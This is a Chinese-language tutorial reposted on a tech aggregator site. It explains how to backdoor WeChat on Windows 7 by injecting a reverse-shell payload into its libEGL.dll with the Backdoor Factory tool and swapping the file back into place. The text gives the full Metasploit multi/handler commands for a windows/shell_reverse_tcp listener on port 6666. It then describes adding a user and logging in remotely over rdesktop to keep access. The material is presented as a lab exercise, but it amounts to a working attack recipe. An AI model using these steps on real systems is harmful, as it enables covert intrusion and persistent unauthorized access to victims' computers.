微信DLL劫持反弹shell
发布时间:2020-12-14 05:56:14 所属栏目:Windows 来源:网络整理
导读:一、操作环境 Windows7 :? 微信? , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件) Kali Linux? :? BDF(劫持工具,可用于DLL注入) 可以互相ping通 二、操作步骤 Step1:在win7中打开微信和Process Explorer,在Process Expl
一、操作环境 Windows7 :? 微信? , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件) Kali Linux? :? BDF(劫持工具,可用于DLL注入) 可以互相ping通 二、操作步骤 Step1:在win7中打开微信和Process Explorer,在Process Explorer中找到微信进程,再找到微信调用的DLL文件,如:libEGL.dll ? Step2:将该文件拷贝到Kali的BDF工具目录下; ? Step3:运行backdoor.py,向libEGL.dll中注入 ? ? Step4:将注入完成的文件拷贝到win7微信的原位置,替换掉原文件,记得先关闭微信; ? Step5:在Kali开启postgresql,运行MSF; service postgresql start msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp msf5 exploit(multi/handler) > show options msf5 exploit(multi/handler) > set lhost kali的IP msf5 exploit(multi/handler) > set lport 6666 msf5 exploit(multi/handler) > run Step6:在win7中运行微信; ? Step7:添加用户,在Kali使用rdesktop远程登陆win7。 ?至此,便在win7电脑留下后门。? (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
推荐文章
站长推荐
- 什么是Windows等价的pwd.getpwnam(用户名).pw_di
- Windows – sox FAIL util:无法加载MAD解码器库
- 如何让Windows 2.7和Python 3.1在Windows 7上共存
- windows-server-2003 – 如何在Windows 2003服务
- windows-7 – 如何在Windows小工具中将g:文本样
- windows – 增加最多(超过10个)TCP连接
- windows-vista – Vista Ultimate 64 w / SP1还可
- windows-phone-8 – Windows phone 8性能进度条
- 即使使用正确的私钥,Windows密码也不会在AWS EC2
- windows – 高级安装程序中的增量版本号
热点阅读